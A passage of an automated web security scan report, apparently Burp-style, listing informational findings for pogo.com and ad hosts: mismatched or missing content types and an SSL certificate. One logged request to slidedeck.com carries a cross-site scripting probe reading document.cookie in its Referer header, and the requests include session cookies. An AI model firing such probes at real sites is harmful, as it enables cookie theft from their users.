Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; com.pogo.unid=6606578824406775

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:24:17 GMT
Server: Apache-Coyote/1.1
Content-Length: 8870

var JvmHandler = {};
JvmHandler.javaAlert = function (option){
switch(option){
        case 'reco' :
JvmHandler.reportAlert("JVM Test: Recommend Upgrade");
        break;
        case
...[SNIP]...

25.26. http://www.pogo.com/v/DV37sw/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/v/DV37sw/include/css/pogo.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /v/DV37sw/include/css/pogo.css HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/%3Frefid%3Dheadernav_fp_shopmenu
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Age: 130413
Date: Fri, 07 Jan 2011 13:24:32 GMT
Expires: Wed, 06 Jan 2016 13:24:33 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4560-1170991451000"
Last-Modified: Fri, 09 Feb 2007 03:24:11 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 4560

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

25.27. http://www.pogo.com/vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /vl/img/misc/sidenav/en_US/pogo/s-icon-cash.png HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536595120-New%7C1297128595120%3B

Response

HTTP/1.1 200 OK
Age: 130498
Date: Fri, 07 Jan 2011 13:24:31 GMT
Expires: Wed, 06 Jan 2016 13:24:32 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"1057-1279732519000"
Last-Modified: Wed, 21 Jul 2010 17:15:19 GMT
Content-Type: image/png
Content-Length: 1057
Server: Apache-Coyote/1.1

GIF89a.......nE.lM....nG.xY.nD.mL....t.......@r7..~
..%mL.....m...Jz[.........6..T.....O..I..O......mJ.mO.....z%........Q...z] .|#..%.t...T.|....a........bmI.....>........+vV..e...-...}a...J..h..s.
...[SNIP]...

25.28. http://www.pogo.com/vl/img/prize/en_US/pogo/daily-prize-drawings.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/vl/img/prize/en_US/pogo/daily-prize-drawings.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /vl/img/prize/en_US/pogo/daily-prize-drawings.gif HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/prize/prize.do?pageSection=header_prizes
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1294536535696-New%7C1297128535696%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 130309
Date: Fri, 07 Jan 2011 13:26:40 GMT
Expires: Wed, 06 Jan 2016 13:26:40 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"59868-1283545104000"
Last-Modified: Fri, 03 Sep 2010 20:18:24 GMT
Content-Type: image/gif
Content-Length: 59868
Server: Apache-Coyote/1.1

.PNG
.
...IHDR..............y.p... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

25.29. https://www.pogo.com/surveys/peanutlabsprocesssubs.do previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.pogo.com
Path:	/surveys/peanutlabsprocesssubs.do

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

25.30. https://www.pogo.com/v/DV37sw/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.pogo.com
Path:	/v/DV37sw/include/css/pogo.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

Response

25.31. http://www.slidedeck.com/wp-content/plugins/slidedeck/lib/slidedeck.jquery.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.slidedeck.com
Path:	/wp-content/plugins/slidedeck/lib/slidedeck.jquery.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/plugins/slidedeck/lib/slidedeck.jquery.js?ver=1.3.6 HTTP/1.1
Host: www.slidedeck.com
Proxy-Connection: keep-alive
Referer: http://www.slidedeck.com/download71eb8--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E873957fd8a7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:30:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Jan 2011 21:37:01 GMT
ETag: "eb1898-30bd-119cf940"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 12477

/**
* SlideDeck 1.2.1 Pro - 2011-01-03
* Copyright (c) 2011 digital-telepathy (http://www.dtelepathy.com)
*
* BY USING THIS SOFTWARE, YOU AGREE TO THE TERMS OF THE SLIDEDECK
* LICENSE AGRE
...[SNIP]...

25.32. http://www1.peanutlabs.com/wp-content/themes/showtime/scripts/timthumb.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/scripts/timthumb.php

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /wp-content/themes/showtime/scripts/timthumb.php?src=http://www1.peanutlabs.com/wp-content/uploads/2010/12/peanuts.jpeg&w=60&h=60&zc=1 HTTP/1.1
Host: www1.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www1.peanutlabs.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 400 Bad Request
Date: Sun, 09 Jan 2011 01:34:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Content-Length: 2208
Connection: close
Content-Type: image/jpeg

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 80
...C...............
.

...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...(((((((((((((((((((((((((((((((
...[SNIP]...

26. Content type is not specified previous next
There are 9 instances of this issue:

http://ads.bluelithium.com/st
http://adserving.cpxinteractive.com/st
http://board-games.pogo.com/favicon.ico
http://card-games.pogo.com/favicon.ico
http://click.linksynergy.com/fs-bin/stat
http://game3.pogo.com/favicon.ico
http://r.turn.com/favicon.ico
http://www.pogo.com/favicon.ico
https://www.pogo.com/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

26.2. http://adserving.cpxinteractive.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Request

GET /st?ad_type=ad&ad_size=728x90&section=628381 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:28:47 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 01:28:47 GMT
Pragma: no-cache
Content-Length: 4301
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

26.3. http://board-games.pogo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: board-games.pogo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; prod.JID=1750257D37B483E68CD1C5FD3B9D0CC1.000241; com.pogo.unid=6606248111925025; s_pers=%20s_nr%3D1294539172918-New%7C1297131172918%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 137078
Date: Fri, 07 Jan 2011 13:24:38 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

26.4. http://card-games.pogo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: card-games.pogo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294539198089-New%7C1297131198089%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=BC19526F2455BD28F04F73E408DC4DDB.000257; com.pogo.unid=6606467155258060

Response

HTTP/1.1 200 OK
Age: 137258
Date: Fri, 07 Jan 2011 13:25:09 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

26.5. http://click.linksynergy.com/fs-bin/stat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/stat

Request

GET /fs-bin/stat HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 190
Date: Sun, 09 Jan 2011 02:07:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Missing offer id cookie
</body></html>

26.6. http://game3.pogo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Date: Sun, 09 Jan 2011 01:34:12 GMT
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

26.7. http://r.turn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=undefined%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=undefined%7C14983%7C14983%7C14983%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14983%7Cundefined%7C14983; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"318-1282604189000"
Last-Modified: Mon, 23 Aug 2010 22:56:29 GMT
Content-Length: 318
Date: Sun, 09 Jan 2011 03:35:13 GMT

..............(.......(....... ........................................................................................................3333330.33..330.33..330.33..330.33..330.33..330.33..330.33..330.3
...[SNIP]...

26.8. http://www.pogo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_pers=%20s_nr%3D1294536318970-New%7C1297128318970%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 130221
Date: Fri, 07 Jan 2011 13:24:32 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

26.9. https://www.pogo.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 134474
Date: Fri, 07 Jan 2011 13:24:33 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"766-1118367449000"
Last-Modified: Fri, 10 Jun 2005 01:37:29 GMT
Content-Length: 766
Server: Apache-Coyote/1.1

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...

27. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.pogo.com
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Feb 16 17:03:41 CST 2009
Valid to:	Mon Apr 18 17:03:41 CDT 2011

Certificate chain #1

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by Unforgivable Vulnerabilities, DORK Search, Exploit Research at Thu Jan 13 10:03:58 CST 2011.